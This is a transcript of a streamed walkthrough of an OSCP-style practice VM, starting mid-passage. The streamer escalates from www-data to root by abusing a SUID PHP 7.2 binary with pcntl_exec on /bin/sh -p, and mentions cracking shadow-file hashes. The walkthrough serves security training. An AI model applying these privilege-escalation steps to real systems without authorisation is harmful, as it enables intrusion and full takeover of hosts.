there was something in there. I didn't see anything in the config files. All right, we're just going to skip past a lot of this. Okay, so there's our version of sudo. I looked up the sudo exploits. I looked up the MySQL exploits. I looked up the Apache exploits. Now that I think about it, I think there was one light DM exploit for privilege escalation, and I did go through the steps to get it. I wasn't able to make it work though. I don't know if he put that in there as like just something to take you off the path, but or maybe that is a way to get root. I wasn't able to get the light DM to give me root though. Those are useful, obviously. Knowing what GCC version or G++ version you have on here is important if you want to compile exploits for this machine. I've learned the hard way. You always compile exploits on the machine that you want to exploit it on if you can. Makes life a lot easier. So usually whenever I have like a C++ exploit, I'll send it over to the target box and just compile it there in the temp directory. Things that we can read and write to. This is important. If the shadow file was readable by us, we would just open that up and grab out the hashes, and we would be whatever user we wanted to be. We'd combine that with the password and run it through John the Ripper. I think that's what you use. It's John the Ripper to do that. That was another OSCP trick. All right, here we go. SUID files. So this is what I wanted to show you here. So similar to the machine output that I have in my tool, the SUID files, it just lists them. There's really not any other information. It's up to you to know what to use here. And if you're like me, I didn't know what to use, so I had to go through these one at a time. It was a huge pain in the ass. All right, so that was actually what I wanted to show you, was that SUID thing. So we're going to continue on here. I want to run the SUID 3num real quick. So we're going to use that command. That's going to pull it down to our box. And then we are just going to do Python suid3num.py and let that run for a second here. This does take a moment to... Never mind, it didn't take a moment to run. I thought it took a little bit longer than that. Okay, so this is the same list that both my script, the machine info, printed out, and also linenum printed out. Not very useful. If you look here, it breaks that list down, and it says default binaries, don't bother. Meaning you're not going to get root with these. Okay, these are default SUID binaries. However, if you look here, custom SUID binaries, interesting stuff. It's got user bin PHP 7.2. So I think that's what we're going to try and use to escalate privileges. Now, I don't know why this didn't work. I wish it did. It would have been a super awesome win for me. But I did something along the lines of user bin PHP 7.2 and then R for execute the command without the PHP tags. And then I did shell execute bin SHI for interactive. Like, I mean, that should work. It should run it as root and then give me a root shell. I'm pretty sure I am not root though. I forget the command. What is it? Anyways, it's not. Here, let me get out of my Shinobi shell. Maybe the Shinobi shell's eating it. Let's try that again. Yeah, so it's not even working. Let's try getting rid of tac I. See what that does. Yeah, it's not even working here. What's another way we might be able to do it? Let me look at the TTY cheat sheet here. How does it execute a command? So it uses tac C. Maybe it is tac C instead of R. I thought it was R though. Maybe that's why this didn't work. Oh, because I'm running PHP, not Python, dumbass. And I don't have anything in here for PHP, but it's R. Okay, it's R. So if we do user bin PHP 7.2 R shell execute. Actually, we won't do shell execute. We'll just do echo it works. There you go. It works. So that should work. I don't know why it doesn't. There's another command. Yet another thing I learned on this box. Let me pull up the exact command because I don't remember the exact keyword for it. Or the exact function call. It's the first time I've used it. PCNTL. If anybody can tell me what PCNTL is and why that's different than shell execute, I would love to know. So if I do PCNTL execute and then bin sh, and then this one actually takes a parameter here. And yes, I tried this with the shell execute, this parameter, and I still didn't get it to work. Not sure why. It must be a fault in the library or something, the way it executes. And that should be it. Who am I? Root. There you go. Rooted. So if we head over to the root directory now, should be able to cat out proof.txt. First we got to actually be in the root directory. Let's do cat root proof.txt, and there you go. So that box is rooted now. I would really love to know. I wonder if I exit out of this. So exit that. So now I should be www data again. I wonder if I do user. What was that? User bin PHP 7.2. User bin PHP 7.2. I wonder if I use that tac p for shell execute, if it'll work. Pretty sure I tried this. We'll do bin sh tac p. Oh, you know what though? We got to use single quotes. Bin sh tac p. Semicolon. Could not open input file. Whatever the fuck that means. Yeah, I don't know. But that is how you get root. You do user bin PHP 7.2 and then PCNTL exec, and then we're going to do bin sh, and then it takes another parameter tac p for the argument, and then we're going to close that out. And well, what the hell? PCNTL, did I spell it wrong? Execute. I wonder if it's thrown up over the way I did the quotes. That would be really funny. Or the fact that no, it should work with a semicolon. Bin sh. I mean, I'm reading off my own daggone notes here. My notes have it the other way. It might be freaking out because we just did a because we just got the root shell. Oh, I fucked that up, didn't I? Oh no! There we go. Yeah, I think I was already inside a shell. Maybe that's why it was freaking out. It's like shell inception here. Okay, let's try this again now that I'm out of that shell, that secondary shell. Oh, I missed the quote again. Am I still in another shell? Oh, no, I lost my shell. All right, let's get it back. I gotta root this again now. Can't not end on a root. There we go. Okay, we'll go to the TMP. And then, what do we do? Oh, I need my TTY shell first. So we're gonna do shinobi shell.py tact. That's gonna give me my TTY shell here. We're gonna do that. All right, we got our TTY shell. Let's go back up here to where we actually got root. And we'll just copy this command out again. Oh, I bet you it was because I was forgetting the R. Duh. There we go. Boom. Rooted. Rooted again. That was a really fun box. Really, good work to the person that put that together. I have always wanted to build vulnerable VMs, and I mean, I guess I'm probably to a point now in experience where I could build one. Maybe I will. Maybe I'll do a stream and you guys can go wreck it. The problem I have is that I don't know every single entry point. So if I build a vulnerable VM, I'm afraid it's going to it'll have like entry points that I wasn't anticipating. And I'll put like 20 hours into building this thing, and then somebody will read it in 1 second because I missed like some default cred or something stupid. But yeah, really great work. I'm going to be trying to do these on a bi-weekly basis. So in 2 weeks, I should have another box ready for you. And I'm going to try and keep doing the OSCP prep ones. I have a few other walkthroughs on my blog for VulnHub boxes. But I'm not going to do those because those were too easy. Those are like 1 second ones. There's no way I could do a stream on those. So if you liked what you saw, please give me a thumbs up, subscribe, let me know in the comments if it sucked. Or you could just reach out to me on Twitter and tell me it sucked. I'm cool with that too. Either way, I really appreciate you coming by and watching. If you have any comments or feedback, ways that I can improve this stream, please let me know. All right, until next time, you guys, good luck with your rooting, and